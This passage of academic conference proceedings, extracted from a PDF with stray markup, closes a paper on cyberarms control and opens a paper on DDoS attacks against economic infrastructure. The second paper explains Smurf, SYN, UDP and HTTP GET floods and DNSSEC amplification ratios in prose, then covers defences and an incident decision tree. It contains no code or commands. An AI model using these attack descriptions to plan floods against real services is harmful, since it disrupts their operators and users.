same logic beh<strong>in</strong>d the design of easily removable landm<strong>in</strong>es. (Rowe 2010 ECIW) proposed four<br />
techniques that can be used to make cyberattacks that are easier to reverse by the attacker than by the<br />
victim even when the victim tries to restore from backup (Dorf and Johnson 2007). They are: (1)<br />
encryption of key software and data by the attacker where the victim does not have the key to decrypt it;<br />
(2) obfuscation of a victim's system by the attacker by data manipulations that are hard to understand yet<br />
algorithmic and reversible; (3) withhold<strong>in</strong>g by the attacker of key <strong>in</strong>formation that is important to the<br />
victim; and (4) deception by the attacker of the victim to make them th<strong>in</strong>k their systems are not<br />
operational when they actually are. In the first two cases, reversal can be achieved by software<br />
operations by the attacker; <strong>in</strong> the third case, the attacker can restore miss<strong>in</strong>g data; and <strong>in</strong> the fourth case,<br />
the attacker can reveal the deception.<br />
How do we encourage attackers to use reversible attacks? There are several <strong>in</strong>centives. One would be<br />
if the attacker will eventually need to pay reparations, as the United Nations could stipulate as part of a<br />
negotiated settlement of a conflict (Torpey 2006). Even <strong>in</strong> an <strong>in</strong>vasion or regime change, it is likely that<br />
the impacts of cyberweapons will need to be mitigated—<strong>in</strong>deed, the perceived possibility of mitigation will<br />
likely drive the adoption of cyberweapons. Another <strong>in</strong>centive comes from <strong>in</strong>ternational outcry at us<strong>in</strong>g<br />
unethical methods and the result<strong>in</strong>g ostracism of the offend<strong>in</strong>g state, as with the use of biological<br />
weapons. Another <strong>in</strong>centive is if a victim is likely to respond <strong>in</strong> like k<strong>in</strong>d, where<strong>in</strong> use of a reversible<br />
attack could encourage an adversary to do the same because otherwise they would appear to be<br />
escalat<strong>in</strong>g the conflict (Gardam 2004). Also, nonreversible attacks could be <strong>in</strong>terpreted as violat<strong>in</strong>g the<br />
laws of warfare <strong>in</strong> regard to unjustified force when reversible methods are easily available. Responses of<br />
the <strong>in</strong>ternational community to analogous such violations <strong>in</strong>clude sanctions, boycotts, f<strong>in</strong>es, and legal<br />
proceed<strong>in</strong>gs (Berman 2002).<br />
3.4 Support for <strong>in</strong>ternational cooperation<br />
Global cybersecurity is h<strong>in</strong>dered by a lack of cybersecurity action plans at the national level (Ghernouti-<br />
Helie 2010). Reduc<strong>in</strong>g vulnerabilities and threats from cyber attack requires the policy community to<br />
support norms of behavior among states, enforceable at the national level, to secure the "cyber<br />
commons". The 2010 U.S. Quadrennial Defense Review advocates strengthen<strong>in</strong>g <strong>in</strong>ternational<br />
partnerships to secure the cyber doma<strong>in</strong> us<strong>in</strong>g technical, legal and organizational cooperation, and a<br />
recent U.S. GAO report (USGAO 2010) recommended that the U.S. "establish a coord<strong>in</strong>ated approach<br />
for the federal government <strong>in</strong> conduct<strong>in</strong>g <strong>in</strong>ternational outreach to address cybersecurity issues<br />
strategically."<br />
Several <strong>in</strong>ternational agreements deal<strong>in</strong>g with cybercrime can serve as models for cyberarms control.<br />
The Council of Europe Convention on Cybercrime, adopted <strong>in</strong> November 2001, seeks to align domestic<br />
substantive and procedural laws for evidence gather<strong>in</strong>g and prosecution, and to <strong>in</strong>crease <strong>in</strong>ternational<br />
collaboration and to improve <strong>in</strong>vestigative capabilities for coord<strong>in</strong>at<strong>in</strong>g E.U. efforts on cyber crimes.<br />
Adopted and ratified by the US <strong>in</strong> 2007, it is considered a model law for the rest of the world. The World<br />
Summit on the Information Society Declaration of Pr<strong>in</strong>ciples endorsed a global culture of cybersecurity<br />
that is promoted, developed, and implemented <strong>in</strong> cooperation with all stakeholders and <strong>in</strong>ternational<br />
expert bodies. The International Telecommunications Union (ITU) and U.N. General Assembly have also<br />
passed several resolutions address<strong>in</strong>g the crim<strong>in</strong>al misuse of <strong>in</strong>formation. The efforts of the ITU have<br />
culm<strong>in</strong>ated <strong>in</strong> the International Multilateral Partnership aga<strong>in</strong>st Cyber Threats (IMPACT) although the<br />
United States does not currently support it. IMPACT is a Global Response Centre based <strong>in</strong> Cyberjaya,<br />
Malaysia. It was set up <strong>in</strong> 2009 to serve as the <strong>in</strong>ternational community’s ma<strong>in</strong> cyberthreat resource by<br />
proactively track<strong>in</strong>g and defend<strong>in</strong>g aga<strong>in</strong>st cyberthreats. The center's alert and response capabilities<br />
<strong>in</strong>clude an Early Warn<strong>in</strong>g System that enables IMPACT members to identify and head off potential and<br />
imm<strong>in</strong>ent attacks before they can <strong>in</strong>flict damage on national networks.<br />
Many of the ideas mentioned here benefit from <strong>in</strong>ternational cooperation (Yannakogeorgos 2010;<br />
Yannakogeorgos 2011). An example is shar<strong>in</strong>g of data collected from monitor<strong>in</strong>g of the Internet<br />
225
Neil Rowe et al.<br />
(Erbschloe 2001). Data on just source address, dest<strong>in</strong>ation address, and packet size is not very sensitive<br />
or subject of privacy concerns, and should be useful to share even when traffic is encrypted. The<br />
European Convention on Cybercrime makes a step <strong>in</strong> that direction. So that appears to be a good <strong>in</strong>itial<br />
focus for <strong>in</strong>ternational agreements on shar<strong>in</strong>g of data, and not just for cyberweapons track<strong>in</strong>g.<br />
Other agreements could focus on mandat<strong>in</strong>g technology that will aid <strong>in</strong> manag<strong>in</strong>g a cyberweapons threat.<br />
An example would be a mandate for countries to use IPv6 <strong>in</strong>stead of IPv4 to enable better attribution of<br />
events on the Internet; rogue states could be told that they cannot connect to the Internet unless they use<br />
IPv6. Other mandates could stipulate architectures <strong>in</strong> which attribution of traffic is easier such as<br />
m<strong>in</strong>imum requirements on persistence of cached records. Other useful agreements could prohibit lesscontrollable<br />
attacks such as worms and mutat<strong>in</strong>g viruses, to achieve better discrim<strong>in</strong>ation of military from<br />
civilian targets <strong>in</strong> cyberattacks (Shulman 1999).<br />
Crim<strong>in</strong>al prosecution of a nation's hacker groups by its government could be an important stipulation of<br />
agreements. For <strong>in</strong>stance, when Philipp<strong>in</strong>e hackers <strong>in</strong> 2000 launched a virus that attacked computers<br />
worldwide and the Philipp<strong>in</strong>e government was <strong>in</strong>itially unhelpful, improvements under <strong>in</strong>ternational<br />
pressure were subsequently made by it, both legally and managerially, to enable a better response <strong>in</strong> the<br />
future. Other possible agreements could follow those of traditional arms control, as for <strong>in</strong>stance a<br />
commitment to use cyberweapons only <strong>in</strong> self-defense, or agreed export controls on cyberweapons<br />
technology. We do need to make legal dist<strong>in</strong>ctions between cybercrime, cyberconflict, cyberespionage<br />
and cyberterror as this is necessary when creat<strong>in</strong>g a regulatory regime for cyberweapons (W<strong>in</strong>gfield<br />
2009). One model that could be studied is the Wassenaar Arrangement for export controls, which could<br />
be extended to <strong>in</strong>formation technology products.<br />
4. Conclusion<br />
Cyberarms agreements have been said to be impossible. But technology is chang<strong>in</strong>g that. We can seize<br />
and analyze drives on which cyberweapons were developed; we can detect the necessary test<strong>in</strong>g of<br />
cyberweapons; we can create <strong>in</strong>centives for self-attribut<strong>in</strong>g and reversible cyberattacks; and we can<br />
develop and ratify new k<strong>in</strong>ds of <strong>in</strong>ternational agreements. While we cannot stop cyberweapons<br />
development, we may be able to control its more dangerous aspects much as we control chemical,<br />
biological, and nuclear weapons, and limit it to responsible states. It is time to consider seriously the<br />
possibility of cyberarms control.<br />
The views expressed are those of the author and do not represent those of any part of the U.S. Government.<br />
References<br />
Berman P. (2002) "The Globalization of Jurisdiction," University of Pennsylvania Law Review, Vol. 151 No. 2, pp.<br />
311-545.<br />
Beverly, R., and Soll<strong>in</strong>s, K. (2008) "An Internet Protocol Address Cluster<strong>in</strong>g Algorithm," USENIX SysML Workshop.<br />
Brenner, S. (2010) Cybercrime: Crim<strong>in</strong>al Threats from Cyberspace, Santa Barbara, CA, US: Praeger.<br />
Clarke, R., and Knake, R. (2010) Cyberwar: The Next Threat to National <strong>Security</strong> and What To Do about It, New<br />
York, US: HarperColl<strong>in</strong>s.<br />
Croft, S. (1996) Strategies of Arms Control: A History and Typology, Manchester, UK: Manchester University Press.<br />
Dorf, J., and Johnson, M. (2007) "Restoration Component of Bus<strong>in</strong>ess Cont<strong>in</strong>uity Plann<strong>in</strong>g," <strong>in</strong> Tipton, H., and<br />
Krause, M. (Eds.), Information <strong>Security</strong> Management Handbook, Sixth Edition, Boca Raton, FL, US: CRC<br />
Press, pp. 1645-1654.<br />
Erbschloe, R. (2001) Information Warfare: How to Survive Cyber Attacks, Berkeley, CA, US: Osborne/McGraw-Hill,<br />
2001.<br />
Gady, F.-S. (2010, March 24) "Africa's Cyber WMD," Foreign Policy.<br />
Gardam, J. (2004) Necessity, Proportionality, and the Use of Force by States, Cambridge, UK: Cambridge University<br />
Press.<br />
Garf<strong>in</strong>kel, S. (2006, September) "Forensic Feature Extraction and Cross-Drive Analysis," Digital Investigation, Vol. 3,<br />
Supplement 1, pp. 71-81.<br />
Garf<strong>in</strong>kel, S., Roussev, V., Nelson, A., and White, D. (2010) "Us<strong>in</strong>g Purpose-Built Functions and Block Hashes to<br />
Enable Small Block and Sub-File Forensics," DFRWS, Portland, OR.<br />
Ghernouti-Helie, S. (2010) A National Strategy for an Effective Cybersecurity Approach and Culture, New York, US:<br />
IEEE Press.<br />
Johnson, P. (2002) "Is It Time for a Treaty on Information Warfare?" <strong>in</strong> Schmitt, M., and O'Donnell, B., Computer<br />
Network Attack and International Law (International Law Studies Volume 76), pp. 439-455, Newport, RI, US:<br />
Naval War College.<br />
Hvistendahl, M. (2010, March 3) "Ch<strong>in</strong>a's Hacker Army," Foreign Policy.<br />
226
Neil Rowe et al.<br />
Libicki, M.(2007) Conquest <strong>in</strong> Cyberspace: National <strong>Security</strong> and Information Warfare, New York, US: Cambridge<br />
University Press.<br />
Mal<strong>in</strong>, C., Casey, E., and Aquil<strong>in</strong>a, J. (2008) Malware Forensics: Investigat<strong>in</strong>g and Analyz<strong>in</strong>g Malicious Code,<br />
Syngress.<br />
Markoff, J. (2010, September 26) "A Silent Attack, But Not a Subtle One," New York Times, p. A6.<br />
Mel, H., and Baker, D. (2000) Cryptography Decrypted, 5th edition, Boston, MA, US: Addison-Wesley Professional.<br />
Munz, G., and Carle, G. (2007, May) "Real-Time Analysis of Flow Data for Network Attack Detection," Proc. 10th<br />
IFIP/IEEE Intl. Symposium on Integrated Network Management, pp. 100-108.<br />
O'Neill, P. (2010) Verification <strong>in</strong> an Age of Insecurity: The Future of Arms Control Compliance, New York, US:<br />
Oxford.<br />
Price, R. (1997) The Chemical Weapons Taboo, Ithaca, NY, US: Cornell University Press.<br />
Rooney, B. (2011, February 4) "Calls for Geneva Convention <strong>in</strong> Cyberspace," Wall Street Journal.<br />
Rowe, N. (2010) "The Ethics of Cyberweapons <strong>in</strong> Warfare," Journal of Technoethics, Vol. 1, No. 1, pp. 20-31 [JTE].<br />
Rowe, N. (2010, July) "Towards Reversible Cyberattacks," Proc. 9th European Conference on Information Warfare<br />
and <strong>Security</strong>, Thessaloniki, Greece [ECIW].<br />
Rowe, N., and Garf<strong>in</strong>kel, S. (2010, May) "Global Analysis of Disk File Times," Fifth International Workshop on<br />
Systematic Approaches to Digital Forensic Eng<strong>in</strong>eer<strong>in</strong>g, Oakland CA.<br />
Rowe, N., and Goh, H. (2007, June) "Thwart<strong>in</strong>g Cyber-Attack Reconnaissance with Inconsistency and Deception," 8 th<br />
IEEE Information Assurance Workshop, West Po<strong>in</strong>t, NY, pp. 151-158.<br />
Shulman, M. (1999) "Discrim<strong>in</strong>ation <strong>in</strong> the Laws of Information Warfare," Columbia Journal of Transnational Law, Vol.<br />
37, pp. 939-968.<br />
Torpey J. (2006) Mak<strong>in</strong>g Whole What Has Been Smashed: On Reparations Politics, Cambridge, MA, US: Harvard<br />
University Press.<br />
Trost, R. (2010) Practical Intrusion Analysis, Upper Saddle River, NJ, US: Addison-Wesley.<br />
United Nations (1991) F<strong>in</strong>al Document: Third Review Conference of the Parties to the Convention on the Prohibition<br />
of the Development, Production, and Stockpil<strong>in</strong>g of Bacteriological (Biological) and Tox<strong>in</strong> Weapons and on<br />
Their Destruction, BWC/DONF.II/23, Geneva, Switzerland.<br />
USCCU (United States Cyber Consequences Unit) (2009, August) "Overview by the US-CCU of the Cyber Campaign<br />
aga<strong>in</strong>st Georgia <strong>in</strong> August of 2008," US-CCU Special Report, downloaded from www.usccu.org.<br />
USGAO (United States Government Accountability Office) (2010, March 5) "Cybersecurity: Progress Made But<br />
Challenges Rema<strong>in</strong> <strong>in</strong> Def<strong>in</strong><strong>in</strong>g and Coord<strong>in</strong>at<strong>in</strong>g the Comprehensive National Initiative," Wash<strong>in</strong>gton, D.C., US:<br />
Government Accountability Office.<br />
Wayner, P. (2002) Disappear<strong>in</strong>g Cryptography: Information Hid<strong>in</strong>g: Steganography and Watermark<strong>in</strong>g, San<br />
Francisco, CA, US: Morgan Kaufmann.<br />
W<strong>in</strong>gfield, T. (2009) "International Law and Information Operations," <strong>in</strong> Kramer, F., Starr, S., and Wentz, L. (Eds.),<br />
Cyberpower and National <strong>Security</strong>, Wash<strong>in</strong>gton DC: National Defense University Press, pp. 525-542.<br />
Yannakogeorgos, P. (2010, October) "Cyberspace, The New Frontier - And the Same Old Multilateralism," <strong>in</strong> Reich,<br />
S., Global Norms, American Sponsorship and the Emerg<strong>in</strong>g Patterns of World Politics. Houndsmills, UK:<br />
Palgrave.<br />
Yannakogeorgos, P. (2011) "Promises and Pitfalls of the U.S. National Strategy to Secure Cyberspace," Carlisle, PA,<br />
US: Army War College.<br />
227
Distributed Denial of Service Attacks as Threat Vectors to<br />
Economic Infrastructure: Motives, Estimated Losses and<br />
Defense Aga<strong>in</strong>st the HTTP/1.1 GET and SYN Floods<br />
Nightmares<br />
Libor Sarga and Roman Jašek<br />
Tomas Bata University <strong>in</strong> Zl<strong>in</strong>, Czech Republic<br />
sarga@fame.utb.cz<br />
jasek@fai.utb.cz<br />
Abstract: With the number of nodes <strong>in</strong> the Internet's backbone networks ris<strong>in</strong>g exponentially the possibility of<br />
emergence of entities exhibit<strong>in</strong>g outwardly hostile <strong>in</strong>tents has been steadily <strong>in</strong>creas<strong>in</strong>g. The cyberspace is fitt<strong>in</strong>gly<br />
termed “the no man's land” because of an unprecedented growth pattern and lackluster control mechanisms.<br />
Distributed Denial of Service (DDoS) attacks take advantage of the current situation and primarily aim at destabiliz<strong>in</strong>g<br />
or severely limit<strong>in</strong>g usability of <strong>in</strong>frastructure to the end-users <strong>in</strong> part or whole. A typical DDoS <strong>in</strong>cursion exploit<strong>in</strong>g<br />
heterogeneous base of personal computers consists of two phases: <strong>in</strong>sertion of predef<strong>in</strong>ed set of <strong>in</strong>structions <strong>in</strong>to the<br />
host systems via either self-propagat<strong>in</strong>g or non-reproduc<strong>in</strong>g malware and simultaneous execution of repeat<strong>in</strong>g<br />
queries to a dest<strong>in</strong>ation unit. Generally targeted and deployed to impede functionality of a s<strong>in</strong>gle or multiple servers<br />
with similar properties and utiliz<strong>in</strong>g substantial resources with little to no discernible selection criteria, DDoSes poses<br />
a significant threat. Moreover, effective and efficient countermeasures require experience, precision, speed,<br />
operational awareness, appropriate security protocols summariz<strong>in</strong>g and alleviat<strong>in</strong>g potential consequences <strong>in</strong> case of<br />
failure to conta<strong>in</strong> as well as proactive detection algorithms <strong>in</strong> place. Global response <strong>in</strong>struments (batch filter<strong>in</strong>g,<br />
temporary IP address blacklist<strong>in</strong>g) are only suitable for SYN floods, whereas dur<strong>in</strong>g GET DDoS the same tools can't<br />
be used due to presence of legitimate <strong>in</strong>com<strong>in</strong>g requests. The article scrut<strong>in</strong>izes methodology and policies currently<br />
<strong>in</strong> effect as a part of Critical Infrastructure Protection <strong>in</strong>itiatives. The exam<strong>in</strong>ation allows to outl<strong>in</strong>e procedural<br />
decision-mak<strong>in</strong>g trees <strong>in</strong> the event of a DDoS violation while ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g predef<strong>in</strong>ed and consistent quality of service<br />
level. Furthermore, rationale of perpetrators' motives to <strong>in</strong>stigate the attacks are hypothesized with preferential focus<br />
on economic <strong>in</strong>frastructure components. These hubs of virtualized economy are detailed and target selection<br />
probabilities <strong>in</strong> tactical and strategic perspectives are identified based on known facts. F<strong>in</strong>ancial losses, worst case<br />
scenarios and social repercussions follow<strong>in</strong>g a successful <strong>in</strong>trusion are also <strong>in</strong>vestigated by means of <strong>in</strong>ference from<br />
successful DDoS <strong>in</strong>surgences.<br />
Keywords: distributed denial of service, economic <strong>in</strong>frastructure, potential losses, distributed attacks, network<br />
security, economic hubs, bus<strong>in</strong>ess cont<strong>in</strong>uity assurance, attack vectors analysis, botnet recruitment<br />
1. Introduction<br />
A DoS is a network-based <strong>in</strong>cursion dur<strong>in</strong>g which an agent <strong>in</strong>tentionally saturates system resources by<br />
means of <strong>in</strong>creased network traffic otherwise utilized to handle legitimate <strong>in</strong>quiries (Carl et al 2006).<br />
DDoS differs <strong>in</strong> that it is us<strong>in</strong>g many hijacked systems <strong>in</strong> a hierarchical structure controlled by a s<strong>in</strong>gle<br />
attacker (master) and represents coord<strong>in</strong>ated effort aimed at destabiliz<strong>in</strong>g <strong>in</strong>frastructure elements (Garber<br />
2000). Here, victim-side <strong>in</strong>gress packet flow consists of both genu<strong>in</strong>e and spoofed requests. A scheme of<br />
the attack is depicted below (Figure 1).<br />
Non-existent nomenclature <strong>in</strong>itially prompted some authors (Elliott 2000) to label the <strong>in</strong>fected stations<br />
“ants”, “zombies”, “slaves” (Nagesh & Sekaran) or “drones” (Holz 2005) but the term “bots” is the most<br />
widely used. Despite known modus operandi (CERT 1997) recent cases proved effective and efficient<br />
countermeasures are still yet to emerge.<br />
The rest of the article is divided as follows: <strong>in</strong> the second part we describe various types of DDoS attacks<br />
and defense mechanisms to ma<strong>in</strong>ta<strong>in</strong> predef<strong>in</strong>ed Quality of Service (QoS) level. In the third part we<br />
propose a decision-mak<strong>in</strong>g tree formaliz<strong>in</strong>g steps to undertake <strong>in</strong> order to withstand the <strong>in</strong>com<strong>in</strong>g data<br />
flows while simultaneously ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g (if possible) the affected unit fully operational and m<strong>in</strong>imally<br />
affected. The f<strong>in</strong>al part delimits significant economic centers, their estimated potential of handl<strong>in</strong>g<br />
<strong>in</strong>com<strong>in</strong>g requests and also details perpetrators’ motives <strong>in</strong> correlation with broader socio-economic<br />
environment.<br />
228
Libor Sarga and Roman Jašek<br />
Figure 1: Scheme of a DDoS attack (Mirkovic et al 2004)<br />
2. DDoS Attacks: Threat or annoyance?<br />
“DoS attack: [Usenet,common; note that it's unrelated to DOS as name of an operat<strong>in</strong>g system]<br />
Abbreviation for Denial-Of-Service attack. This abbreviation is most often used of attempts to shut down<br />
newsgroups with floods of spam, or to flood network l<strong>in</strong>ks with large amounts of traffic, or to flood network<br />
l<strong>in</strong>ks with large amounts of traffic, often by abus<strong>in</strong>g network broadcast addresses.” (Raymond 2004)<br />
While there may have been a perception shift <strong>in</strong> relation to the Anonymous <strong>in</strong>itiative attacks (commercial<br />
or national cyberspace <strong>in</strong>cidents presently form the primary threat space of DoS), its def<strong>in</strong>ition still<br />
provides sound basis for analysis.<br />
A DoS attack utilizes only a s<strong>in</strong>gle mach<strong>in</strong>e to distribute the payload. If no sophisticated obfuscation or<br />
spoof<strong>in</strong>g mechanism to hide attacker’s IP address is used the source is easily detectable. The method’s<br />
usability hence quickly dissipated <strong>in</strong> favor DDoS.<br />
However, even for a s<strong>in</strong>gle mach<strong>in</strong>e operat<strong>in</strong>g on a fixed bandwidth it is possible to amplify outgo<strong>in</strong>g<br />
traffic by manipulat<strong>in</strong>g Doma<strong>in</strong> Name System <strong>Security</strong> Extensions (DNSSEC) which emerged as a<br />
reaction to lack<strong>in</strong>g security (possibility of poison<strong>in</strong>g) of the orig<strong>in</strong>al DNS used for doma<strong>in</strong> name to IP<br />
address translation. When an attacker sends a spoofed reply to its own query by forg<strong>in</strong>g or guess<strong>in</strong>g a 16<br />
bit (65,535 values) pseudorandom str<strong>in</strong>g and the malformed data are cached and stored for further<br />
reference the DNS is said to have been poisoned. This may be countered by send<strong>in</strong>g additional request<br />
for the same DNS Resource Record (Trostle 2010) or by transferr<strong>in</strong>g to DNSSEC. Despite the latter’s<br />
advantages it also exhibits the property of <strong>in</strong>com<strong>in</strong>g UDP traffic amplification. Dur<strong>in</strong>g an experimental US<br />
to Europe transfer the output was boosted 51 times <strong>in</strong> proportion to <strong>in</strong>put (Bernste<strong>in</strong> 2010). Send<strong>in</strong>g 10<br />
Mbps can trigger 500 Mbps traffic, 200 Mbps results <strong>in</strong> 10 Gbps flood.<br />
2.1 Dissect<strong>in</strong>g a DDoS…<br />
There are several patterns associated to DDoS each of which exploits different standardized behavior of<br />
the target server based on known communication protocol rout<strong>in</strong>es.<br />
229
2.1.1 Smurf / ICMP<br />
Libor Sarga and Roman Jašek<br />
The perpetrator floods the network with p<strong>in</strong>g response messages from a wide array of sites by redirect<strong>in</strong>g<br />
packets to the target (IBM 2000), often amplify<strong>in</strong>g the attack by send<strong>in</strong>g larger packets (Zargar & Kabiri<br />
2009) or us<strong>in</strong>g broadcast doma<strong>in</strong>s <strong>in</strong> the process. If a doma<strong>in</strong> with 65,356 stations is used, 56 kbps dialup<br />
modem could generate a maximum bandwidth of 3.66 Gbps (Kumar 2007).<br />
ICMP attacks follows the same vector save for the amplification, mak<strong>in</strong>g them less effective compared to<br />
Smurf attacks.<br />
Both types require misconfigured routers and assistance of mutually <strong>in</strong>dependent stations.<br />
2.1.2 TCP SYN / UDP<br />
The procedure for establish<strong>in</strong>g connection between two parties us<strong>in</strong>g a HTTP protocol is called a three<br />
way handshake (Postel 1981). DDoS modifies the sequence by not send<strong>in</strong>g the f<strong>in</strong>al packet after<br />
receiv<strong>in</strong>g confirmation from the server that it is ready for connection, leav<strong>in</strong>g an unused open slot (Eddy<br />
2007).<br />
SYN flood aims at deplet<strong>in</strong>g resources via unf<strong>in</strong>ished, half-open requests. The server capacity be<strong>in</strong>g<br />
limited, it is possible for the effort to be successful if enough bots are simultaneously employed. After the<br />
discovery, description (Bennahum 1994) and subsequent abuse the Computer Emergency Response<br />
Team (CERT) released its first advisory on the matter (CERT 1996).<br />
The UDP version utilizes UDP <strong>in</strong>stead of TCP packets which don’t require a three way handshake to<br />
<strong>in</strong>itiate a session, <strong>in</strong>stead send<strong>in</strong>g a high volume of packets to target’s random ports (IANA 2010).<br />
2.1.3 HTTP GET<br />
The HTTP GET extends TCP SYN. The connection is f<strong>in</strong>alized and established with the request passed<br />
on as legitimate (MacVittie 2008). The attacker now has access to low-level functions, such as GET<br />
command used to “retrieve whatever <strong>in</strong>formation (<strong>in</strong> the form of an entity) is identified by the Request-URI<br />
(Field<strong>in</strong>g et al 1999).” A large number of entities is thus requested, slow<strong>in</strong>g down the server.<br />
2.1.4 Common patterns<br />
Probability of the <strong>in</strong>cursion’s success scale accord<strong>in</strong>g to the number of mach<strong>in</strong>es used as mediators, and<br />
whether additional factors, speed of the attack and automation <strong>in</strong> particular, are <strong>in</strong>troduced (Householder<br />
2002). Apart from Smurf and ICMP attacks which don’t require hijacked arrays of stations all other types<br />
peruse them. Such array is called botnet and usually forms clusters with whole subnets <strong>in</strong>fected by a<br />
suitable propagation carrier like malware.<br />
Attacks exploit standardized network behavior and response mechanisms. Instigators are aware broader<br />
deployment of changes to the exist<strong>in</strong>g protocols and <strong>in</strong>frastructure is a long-term process requir<strong>in</strong>g broad<br />
consensus and considerable resources. This assures strategic cont<strong>in</strong>uity of their operations.<br />
Fundamental properties, features and patterns rema<strong>in</strong> largely unchanged over time with the only<br />
variables be<strong>in</strong>g network utilization, number of controlled nodes and target selection. As the <strong>in</strong>cursions<br />
need to abide by the same protocols they exploit, new forms of DDoS may emerge only with<strong>in</strong> their<br />
conf<strong>in</strong>es. Recently, CXPST attack (Coord<strong>in</strong>ated Cross Plane Session Term<strong>in</strong>ation) was proposed which<br />
cripples routers from mak<strong>in</strong>g proper packet switch<strong>in</strong>g decisions (Schuchard et al. 2011).<br />
2.2 And how to defend aga<strong>in</strong>st it<br />
DoS attacks have s<strong>in</strong>ce their discovery been documented and comprehensively treated (Mirkovic et al<br />
2004) albeit security measures are still fall<strong>in</strong>g short. If the attacker has sufficient resources at their<br />
disposal the probability the victim’s site will be forced to go offl<strong>in</strong>e is substantial. Coord<strong>in</strong>ated efforts to<br />
conta<strong>in</strong> DDoS have begun to materialize only recently as a threat response.<br />
One of the <strong>in</strong>itiatives are honeypots which redirect <strong>in</strong>com<strong>in</strong>g threats <strong>in</strong>to an environment isolated from the<br />
rest of the network where they may be analyzed for <strong>in</strong>formation that identifies the attacker, how to defend<br />
aga<strong>in</strong>st and defeat the <strong>in</strong>truder when their identity isn’t known and no a priori knowledge is available<br />
230
Libor Sarga and Roman Jašek<br />
about how they operate or their motives (Artail 2006). A disadvantage is that if the perpetrator realizes<br />
the code is conta<strong>in</strong>ed with<strong>in</strong> honeypot, they leave immediately and choose different approach vector<br />
(Raynal et al 2004). An arrangement address<strong>in</strong>g the issue was devised which uses multiple randomly<br />
chosen servers to act as roam<strong>in</strong>g honeypots for the detection to be more difficult (Khattab et al 2003).<br />
The solution allows to study malware propagation patterns which may hamper formation of botnets, thus<br />
lower<strong>in</strong>g the risk of a DDoS.<br />
It is possible to stop Smurf / ICMP attacks by configur<strong>in</strong>g routers to deny directed broadcast packets<br />
forward<strong>in</strong>g (IBM 2000), a functionality seldom used outside the scope of exploit<strong>in</strong>g. Victim side, the<br />
solution is to either contact an ISP for temporary traffic block<strong>in</strong>g or notify the owners of the amplify<strong>in</strong>g<br />
mach<strong>in</strong>es (CERT 1998).<br />
The TCP SYN / UDP directly <strong>in</strong>teract with the victim’s network and <strong>in</strong>itiates a hostage situation where<br />
“<strong>in</strong>nocent” requests may be caught <strong>in</strong> the “crossfire”. One proposed solution is to use SYN cookies<br />
(Bernste<strong>in</strong> & Schenk 1996) which associates a random str<strong>in</strong>g to every attempted connection. When the<br />
modified handshake packet conta<strong>in</strong><strong>in</strong>g spoofed or otherwise obfuscated IP address returns and doesn’t<br />
match the sequence, it is discarded. The concept hasn’t yet been widely implemented.<br />
HTTP GET rema<strong>in</strong>s the most difficult to properly address. The ultimate purpose of the connection<br />
becomes apparent only after GET requests have been made and therefore it has to be <strong>in</strong>itially handled<br />
as a genu<strong>in</strong>e one. In this case adm<strong>in</strong>istrators can’t globally batch filter or blacklist any IP address as this<br />
may thwart <strong>in</strong>tended functionality for “hostage” requests. One solution is to migrate to the parallel<br />
comput<strong>in</strong>g environment such as cloud, def<strong>in</strong>ed as “a large pool of easily usable and accessible virtualized<br />
resources [which]… can be dynamically reconfigured to adjust to a variable load (scale), allow<strong>in</strong>g also for<br />
an optimum resource utilization (Vaquero 2009)”. <strong>Security</strong> <strong>in</strong> such shared space is currently a matter<br />
concern and research, the resources for handl<strong>in</strong>g elevated number of requests may guarantee target’s<br />
on-l<strong>in</strong>e bus<strong>in</strong>ess operations cont<strong>in</strong>uity, though. Cloud architecture doesn’t <strong>in</strong> any way mitigate DDoS but<br />
<strong>in</strong>stead adds more resources to the victim’s <strong>in</strong>frastructure capabilities. As the attack may last<br />
un<strong>in</strong>terrupted for several hours or days lease costs and other expenses have to be factored <strong>in</strong>. Despite<br />
cloud itself be<strong>in</strong>g vulnerable to DDoS (Bakshi & Yogesh 2010) its scalability ensures the attacker has to<br />
control a comparatively larger botnet than they had to <strong>in</strong> case of attempts at a s<strong>in</strong>gle server.<br />
Another solution is to redirect <strong>in</strong>com<strong>in</strong>g traffic to a block of unallocated IP range (Mirkovic et al 2004) but<br />
this presupposes forged or otherwise spoofed source addresses embedded <strong>in</strong> the packets, just as SYN<br />
cookies. Backscatter traceback may be also used which traces flood traffic back to its network <strong>in</strong>gress<br />
po<strong>in</strong>ts.<br />
3. Decision-mak<strong>in</strong>g tree <strong>in</strong> case of the attack<br />
The follow<strong>in</strong>g tree (Figure 2) summarizes measures to be taken <strong>in</strong>to account dur<strong>in</strong>g a DDoS attack.<br />
A sudden traffic surge may be expla<strong>in</strong>ed by factors such as market<strong>in</strong>g campaigns, affiliate system, media<br />
headl<strong>in</strong>es appearance, new product <strong>in</strong>troduction etc. Q1 addresses this by explicitly query<strong>in</strong>g whether the<br />
network activity is attributable to DDoS. As the <strong>in</strong>creased bandwidth might be also an opportunity for the<br />
perpetrator to mask the <strong>in</strong>itial phase of the attack, any anomalies should be monitored as to the duration<br />
and volume regardless.<br />
After determ<strong>in</strong><strong>in</strong>g what type of DDoS is be<strong>in</strong>g deployed countermeasures are outl<strong>in</strong>ed as described<br />
above. Infrastructure specifications (server capacity, stress tests results) are rarely released publicly so it<br />
is entirely possible the servers may withstand the attack without compromis<strong>in</strong>g QoS (Q2).<br />
The DDoS threat should be mitigated as soon as possible. All precautions apart from blacklist<strong>in</strong>g suffers<br />
time lags to adm<strong>in</strong>ister and deploy, so Q3 and Q5 <strong>in</strong>cludes time as a factor when monitor<strong>in</strong>g bandwidth<br />
usage fluctuations for changes.<br />
Employ<strong>in</strong>g spare resources (Q4) may help to alleviate the consequences but the only guaranteed<br />
countermeasure is for the victim’s server to be capable of handl<strong>in</strong>g the network flood, <strong>in</strong> worst case<br />
scenario for days on end without <strong>in</strong>terruptions. Migrat<strong>in</strong>g to a scalable cloud or grid environment may help<br />
to achieve this goal.<br />
A feedback loop ensures only optimum amount of additional elements (owned or leased) is used.<br />
231
Figure 2: Procedural decision-mak<strong>in</strong>g tree<br />
Libor Sarga and Roman Jašek<br />
4. Where, why and what happens when the attacks happen?<br />
As economy is one of the discipl<strong>in</strong>es heavily utiliz<strong>in</strong>g <strong>in</strong>formation technology, concerns have been rais<strong>in</strong>g<br />
regard<strong>in</strong>g security, overdependence on and volatility of <strong>in</strong>frastructure as a primary bus<strong>in</strong>ess operations<br />
platform. Despite the Internet’s enormous expansion the economic hubs through putt<strong>in</strong>g significant cash<br />
flows rema<strong>in</strong> largely unchanged.<br />
4.1 Where?<br />
